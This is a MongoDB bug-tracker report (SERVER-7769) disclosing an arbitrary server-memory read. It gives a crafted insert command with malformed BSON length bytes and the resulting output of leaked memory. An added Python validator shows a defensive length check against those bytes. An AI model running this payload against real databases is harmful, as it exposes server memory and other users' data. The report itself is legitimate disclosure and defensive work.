  1. Core Server
  2. SERVER-7769

use --objcheck by default, Server arbitrary memory reading

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Major - P3
    • Resolution: Fixed
    • Affects Version/s: None
    • Fix Version/s: 2.3.2
    • Component/s: None
    • Labels:
      None
    • Operating System:
      ALL

      Description

      The specialists of the Positive Research center have detected a "Server arbitrary memory reading" vulnerability in the MongoDB application.

      Because the BSON document length in a column name is handled incorrectly in the insert command, it is possible to insert a record that contains base64-encoded chunks of server memory.

      Example of use:

      Suppose you have a table "dropme" with write permission.

      Execute the following command with a result:

      > db.dropme.insert(
          {"\x16\x00\x00\x00\x05hello\x00\x010\x00\x00\x00world\x00\x00" : "world"}
        )
      > db.dropme.find()

      { "_id" : ObjectId("50857a4663944834b98eb4cc"), "" : null, "hello" : BinData(0,"d29ybGQAAAAACREAAAAQ/4wJSCCPCeyFjQkRAAAAAAAAAAAAWbcQAAAAMQAAAAEAAABgcicICAAAAAcAAACgKo0JABw5NAMAAAAAAAAAAAAAAMQ3jAlmAGkAQQAAAEIAaQBuAEQAYQB0AGEAKAAxADEAOQAsACIAYgAzAEoAcwBaAEEAQQBBAEEAQQBBAD0AIgApAAAAdABSAFEAAAAiAGgAZQBsAGwAbwAiACAAOgAgAEIAaQBuAEQAYQB0AGEAKAAxADEAOQAsAC...........................ACkALAAgACIAFg==") }

      After base64-decoding the value, you get bytes from random server memory chunks.
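      The following is an added example, not MongoDB's code and not part of the original report: a minimal Python sketch of the kind of length check that object validation is meant to enforce, run over the bytes of the key string shown above. Those bytes declare a 22-byte document whose binary element claims a 12289-byte payload. The names `validate`, `is_valid`, `GOOD` and `REPORTED` are hypothetical, and only a handful of BSON element types are handled.

```python
import struct

class BSONError(ValueError):
    pass

FIXED = {0x01: 8, 0x08: 1, 0x0A: 0, 0x10: 4, 0x12: 8}  # double, bool, null, int32, int64

def _int32(buf, pos, limit):
    if pos + 4 > limit:
        raise BSONError("truncated length field at offset %d" % pos)
    return struct.unpack_from("<i", buf, pos)[0]

def validate(buf, pos=0, limit=None):
    """Check one BSON document starting at pos; return the offset just past it."""
    limit = len(buf) if limit is None else limit
    size = _int32(buf, pos, limit)
    if size < 5 or pos + size > limit:
        raise BSONError("document length %d does not fit its container" % size)
    last = pos + size - 1                      # offset of the closing NUL
    if buf[last] != 0:
        raise BSONError("document is not NUL-terminated")
    pos += 4
    while pos < last:
        etype = buf[pos]
        name_end = buf.find(b"\x00", pos + 1, last)
        if name_end < 0:
            raise BSONError("unterminated element name")
        pos = name_end + 1
        if etype in (0x03, 0x04):              # embedded document / array
            pos = validate(buf, pos, last)
            continue
        if etype in FIXED:
            need = FIXED[etype]
        elif etype in (0x02, 0x05):            # string / binary carry an int32 length
            n = _int32(buf, pos, last)
            if n < 0:
                raise BSONError("negative length %d" % n)
            need = 4 + n + (1 if etype == 0x05 else 0)   # binary adds a subtype byte
        else:
            raise BSONError("type 0x%02x not handled in this sketch" % etype)
        if pos + need > last:
            raise BSONError("element claims %d bytes, %d remain" % (need, last - pos))
        pos += need
    return last + 1

def is_valid(buf):
    try:
        return validate(buf) == len(buf)
    except BSONError:
        return False

# Constructed well-formed document: {"hello": BinData(0, "world")}
GOOD = b"\x16\x00\x00\x00\x05hello\x00\x05\x00\x00\x00\x00world\x00"
# Bytes of the key string from the report above
REPORTED = b"\x16\x00\x00\x00\x05hello\x00\x010\x00\x00\x00world\x00\x00"
```
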

      Credits

      The vulnerability was discovered by Mikhail Firstov, Positive Research Center (Positive Technologies Company)
